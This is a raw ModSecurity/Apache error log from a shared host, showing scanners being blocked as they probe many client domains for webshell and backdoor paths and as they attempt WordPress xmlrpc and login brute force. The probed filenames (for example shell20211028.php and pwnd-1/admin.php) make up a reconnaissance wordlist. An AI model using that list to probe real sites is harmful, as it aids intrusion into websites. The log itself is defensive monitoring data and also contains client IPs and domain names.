[Tue May 26 13:51:45.413664 2026] [security2:error] [pid 560287:tid 560487] [client 15.235.169.50:55673] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/worksec.php"] [unique_id "ahVYGZmX5s6sDS3wJVcZXgAAAMY"]
[Tue May 26 13:51:45.757618 2026] [security2:error] [pid 560287:tid 560466] [client 20.196.127.68:13259] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/worksec.php"] [unique_id "ahVYGZmX5s6sDS3wJVcZbAAAALM"]
[Tue May 26 13:51:45.873133 2026] [security2:error] [pid 560287:tid 560505] [client 15.235.169.50:55774] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/class-json-meta.php"] [unique_id "ahVYGZmX5s6sDS3wJVcZcAAAANc"]
[Tue May 26 13:51:46.343722 2026] [security2:error] [pid 560287:tid 560492] [client 15.235.169.50:55863] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/user.php"] [unique_id "ahVYGpmX5s6sDS3wJVcZfQAAAMs"]
[Tue May 26 13:51:46.435121 2026] [security2:error] [pid 560287:tid 560516] [client 20.196.127.68:13302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/wp-themes.php"] [unique_id "ahVYGpmX5s6sDS3wJVcZfwAAAOI"]
[Tue May 26 13:51:46.540835 2026] [security2:error] [pid 560287:tid 560470] [client 91.230.225.176:23161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 176.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/js/index.php"] [unique_id "ahVYGpmX5s6sDS3wJVcZhQAAALY"]
[Tue May 26 13:51:46.842017 2026] [security2:error] [pid 555743:tid 555920] [client 15.235.169.50:55930] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/cong.php"] [unique_id "ahVYGsjqAquC0YaxQjC5QwAAATk"]
[Tue May 26 13:51:46.900427 2026] [security2:error] [pid 555743:tid 555994] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYGsjqAquC0YaxQjC5OwAAAYM"]
[Tue May 26 13:51:46.943827 2026] [security2:error] [pid 560287:tid 560526] [client 91.230.225.173:40931] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 173.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/js/jquery/jquery.php"] [unique_id "ahVYGpmX5s6sDS3wJVcZnAAAAOw"]
[Tue May 26 13:51:47.068214 2026] [security2:error] [pid 555743:tid 555927] [client 20.196.127.68:13305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/wp-signin.php"] [unique_id "ahVYG8jqAquC0YaxQjC5RgAAAUA"]
[Tue May 26 13:51:47.318384 2026] [security2:error] [pid 555743:tid 555939] [client 15.235.169.50:56066] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/SimplePie/about.php"] [unique_id "ahVYG8jqAquC0YaxQjC5RwAAAUw"]
[Tue May 26 13:51:47.453472 2026] [security2:error] [pid 560287:tid 560456] [client 185.92.25.105:51115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 105.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/function.php"] [unique_id "ahVYG5mX5s6sDS3wJVcZrgAAAKk"]
[Tue May 26 13:51:47.727883 2026] [security2:error] [pid 560287:tid 560466] [client 20.196.127.68:14553] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/wp-blog-header.php"] [unique_id "ahVYG5mX5s6sDS3wJVcZugAAALM"]
[Tue May 26 13:51:47.798177 2026] [security2:error] [pid 560287:tid 560475] [client 15.235.169.50:56144] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-cron.php"] [unique_id "ahVYG5mX5s6sDS3wJVcZvgAAALs"]
[Tue May 26 13:51:48.283739 2026] [security2:error] [pid 560287:tid 560531] [client 15.235.169.50:56226] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/themes/hideo/network.php"] [unique_id "ahVYHJmX5s6sDS3wJVcZyAAAAPE"]
[Tue May 26 13:51:48.423979 2026] [security2:error] [pid 560287:tid 560470] [client 185.92.25.104:63359] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/block-supports/autoload_classmap.php"] [unique_id "ahVYHJmX5s6sDS3wJVcZ0AAAALY"]
[Tue May 26 13:51:48.482083 2026] [security2:error] [pid 560287:tid 560514] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYHJmX5s6sDS3wJVcZxAAAAOA"]
[Tue May 26 13:51:48.619370 2026] [security2:error] [pid 560287:tid 560515] [client 20.196.127.68:13267] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/ws.php"] [unique_id "ahVYHJmX5s6sDS3wJVcZ1AAAAOE"]
[Tue May 26 13:51:48.759954 2026] [security2:error] [pid 555743:tid 555981] [client 15.235.169.50:56307] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/maint/upfile.php"] [unique_id "ahVYHMjqAquC0YaxQjC5VgAAAXY"]
[Tue May 26 13:51:48.958403 2026] [security2:error] [pid 560287:tid 560483] [client 185.92.25.100:48235] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-signup.php"] [unique_id "ahVYHJmX5s6sDS3wJVcZ2QAAAMI"]
[Tue May 26 13:51:49.211202 2026] [security2:error] [pid 555743:tid 555952] [client 20.196.127.68:17346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/wsa.php"] [unique_id "ahVYHcjqAquC0YaxQjC5WQAAAVk"]
[Tue May 26 13:51:49.240274 2026] [security2:error] [pid 555743:tid 555979] [client 15.235.169.50:56392] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-commentin.php"] [unique_id "ahVYHcjqAquC0YaxQjC5WgAAAXQ"]
[Tue May 26 13:51:49.376458 2026] [security2:error] [pid 560287:tid 560424] [client 91.230.225.166:47983] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/network/network.php"] [unique_id "ahVYHZmX5s6sDS3wJVcZ5AAAAIs"]
[Tue May 26 13:51:49.720314 2026] [fcgid:warn] [pid 560287:tid 560428] (70014)End of file found: [client 15.235.169.50:56474] mod_fcgid: can't get data from http client
[Tue May 26 13:51:49.803099 2026] [security2:error] [pid 555743:tid 555910] [client 20.196.127.68:13293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/w.php"] [unique_id "ahVYHcjqAquC0YaxQjC5XwAAAS8"]
[Tue May 26 13:51:49.828934 2026] [security2:error] [pid 560287:tid 560543] [client 91.230.225.167:40993] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/admin/upload/css.php"] [unique_id "ahVYHZmX5s6sDS3wJVcZ7wAAAPs"]
[Tue May 26 13:51:50.190003 2026] [security2:error] [pid 560287:tid 560491] [client 15.235.169.50:56559] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/themes/travelscape/json.php"] [unique_id "ahVYHpmX5s6sDS3wJVcZ9QAAAMo"]
[Tue May 26 13:51:50.253733 2026] [security2:error] [pid 560287:tid 560475] [client 185.92.25.101:28247] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-blog.php"] [unique_id "ahVYHpmX5s6sDS3wJVcZ-AAAALs"]
[Tue May 26 13:51:50.351243 2026] [security2:error] [pid 560287:tid 560430] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYHZmX5s6sDS3wJVcZ8QAAAJE"]
[Tue May 26 13:51:50.400011 2026] [security2:error] [pid 560287:tid 560466] [client 20.196.127.68:14971] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/x.php"] [unique_id "ahVYHpmX5s6sDS3wJVcZ-gAAALM"]
[Tue May 26 13:51:50.680140 2026] [security2:error] [pid 555743:tid 555873] [client 15.235.169.50:56657] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/gelay.php"] [unique_id "ahVYHsjqAquC0YaxQjC5ZgAAAQo"]
[Tue May 26 13:51:50.706145 2026] [security2:error] [pid 560287:tid 560510] [client 185.92.25.95:24313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/file.php"] [unique_id "ahVYHpmX5s6sDS3wJVcaAgAAANw"]
[Tue May 26 13:51:51.038497 2026] [security2:error] [pid 555743:tid 555904] [client 20.196.127.68:14921] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/xx.php"] [unique_id "ahVYH8jqAquC0YaxQjC5aAAAASk"]
[Tue May 26 13:51:51.153236 2026] [security2:error] [pid 555743:tid 555878] [client 15.235.169.50:56751] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp_wrong_datlib.php"] [unique_id "ahVYH8jqAquC0YaxQjC5aQAAAQ8"]
[Tue May 26 13:51:51.617407 2026] [security2:error] [pid 555743:tid 555996] [client 15.235.169.50:56830] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/themes/digital-download/new.php"] [unique_id "ahVYH8jqAquC0YaxQjC5bQAAAYU"]
[Tue May 26 13:51:51.902818 2026] [security2:error] [pid 560287:tid 560443] [client 20.196.127.68:15697] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/xmlrpc.php"] [unique_id "ahVYH5mX5s6sDS3wJVcaGQAAAJ0"]
[Tue May 26 13:51:51.938112 2026] [security2:error] [pid 560287:tid 560437] [client 129.222.147.134:24626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYH5mX5s6sDS3wJVcaJwAAAJg"]
[Tue May 26 13:51:51.944814 2026] [security2:error] [pid 560287:tid 560437] [client 129.222.147.134:24626] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYH5mX5s6sDS3wJVcaJwAAAJg"]
[Tue May 26 13:51:52.157102 2026] [security2:error] [pid 560287:tid 560542] [client 91.230.225.173:40083] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 173.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahVYIJmX5s6sDS3wJVcaKQAAAPo"]
[Tue May 26 13:51:52.194466 2026] [security2:error] [pid 560287:tid 560410] [remote 173.249.21.166:34818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.21.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVYIJmX5s6sDS3wJVcaKAAA1Hk"]
[Tue May 26 13:51:52.230489 2026] [security2:error] [pid 560287:tid 560446] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYH5mX5s6sDS3wJVcaIAAAAKA"]
[Tue May 26 13:51:52.538795 2026] [security2:error] [pid 560287:tid 560452] [client 106.192.248.115:51393] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYIJmX5s6sDS3wJVcaMAAAAKY"]
[Tue May 26 13:51:52.539115 2026] [security2:error] [pid 560287:tid 560452] [client 106.192.248.115:51393] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYIJmX5s6sDS3wJVcaMAAAAKY"]
[Tue May 26 13:51:52.836376 2026] [security2:error] [pid 555743:tid 555977] [client 185.192.71.232:37229] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/blocks/table/int/tmpl/index.php"] [unique_id "ahVYIMjqAquC0YaxQjC5eQAAAXI"]
[Tue May 26 13:51:53.301851 2026] [security2:error] [pid 555743:tid 555985] [client 91.230.225.177:64797] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-l0gin.php"] [unique_id "ahVYIcjqAquC0YaxQjC5gQAAAXo"]
[Tue May 26 13:51:53.415632 2026] [security2:error] [pid 555743:tid 555944] [client 20.196.127.68:14512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/y.php"] [unique_id "ahVYIcjqAquC0YaxQjC5gwAAAVE"]
[Tue May 26 13:51:53.596352 2026] [security2:error] [pid 555743:tid 555994] [client 74.7.228.20:34648] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVYIMjqAquC0YaxQjC5egABg1o"]
[Tue May 26 13:51:53.901500 2026] [security2:error] [pid 560287:tid 560547] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYIZmX5s6sDS3wJVcaTwAAAP8"]
[Tue May 26 13:51:54.193653 2026] [security2:error] [pid 560287:tid 560534] [client 91.230.225.170:38603] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 170.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/js/jquery/suggest.php"] [unique_id "ahVYIpmX5s6sDS3wJVcaWQAAAPQ"]
[Tue May 26 13:51:54.500118 2026] [security2:error] [pid 555743:tid 555934] [client 74.7.241.159:47134] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "north-connect.de"] [uri "/cgi-sys/404.html"] [unique_id "ahVYIsjqAquC0YaxQjC5kQABR0E"]
[Tue May 26 13:51:54.686254 2026] [security2:error] [pid 555743:tid 555973] [client 91.230.225.179:22141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/new.php"] [unique_id "ahVYIsjqAquC0YaxQjC5lwAAAW4"]
[Tue May 26 13:51:55.099177 2026] [security2:error] [pid 560287:tid 560480] [client 185.92.25.136:20009] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/pwnd-1/admin.php"] [unique_id "ahVYI5mX5s6sDS3wJVcaZgAAAL8"]
[Tue May 26 13:51:55.504521 2026] [security2:error] [pid 560287:tid 560551] [client 185.92.25.100:44425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/defaults.php"] [unique_id "ahVYI5mX5s6sDS3wJVcacAAAAQM"]
[Tue May 26 13:51:55.842803 2026] [security2:error] [pid 560287:tid 560456] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYI5mX5s6sDS3wJVcabgAAAKk"]
[Tue May 26 13:51:55.953243 2026] [security2:error] [pid 555743:tid 555918] [client 185.192.71.243:26185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/images/DJP9.php"] [unique_id "ahVYI8jqAquC0YaxQjC5qgAAATc"]
[Tue May 26 13:51:55.987092 2026] [security2:error] [pid 555743:tid 555962] [client 185.207.107.130:35344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 130.107.207.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/index.php/contact-2/"] [unique_id "ahVYI8jqAquC0YaxQjC5qQAAAWM"], referer: http://virgence.com/index.php/contact-2/
[Tue May 26 13:51:56.515787 2026] [security2:error] [pid 555743:tid 555932] [client 185.92.25.136:27329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/customize/index.php"] [unique_id "ahVYJMjqAquC0YaxQjC5uwAAAUU"]
[Tue May 26 13:51:56.630418 2026] [security2:error] [pid 555743:tid 555990] [client 120.231.175.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVYJMjqAquC0YaxQjC5vQAAAX8"], referer: https://www.anujtradingco.com/
[Tue May 26 13:51:56.713242 2026] [security2:error] [pid 555743:tid 555929] [client 202.76.172.220:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYJMjqAquC0YaxQjC5sgAAAUI"]
[Tue May 26 13:51:56.968575 2026] [security2:error] [pid 555743:tid 555985] [client 185.192.71.234:53995] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/shell20211028.php"] [unique_id "ahVYJMjqAquC0YaxQjC5yQAAAXo"]
[Tue May 26 13:51:57.398394 2026] [security2:error] [pid 555743:tid 555944] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYJMjqAquC0YaxQjC5ywAAAVE"]
[Tue May 26 13:51:57.502041 2026] [security2:error] [pid 560287:tid 560429] [client 185.192.71.243:35627] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/natural.php"] [unique_id "ahVYJZmX5s6sDS3wJVcajQAAAJA"]
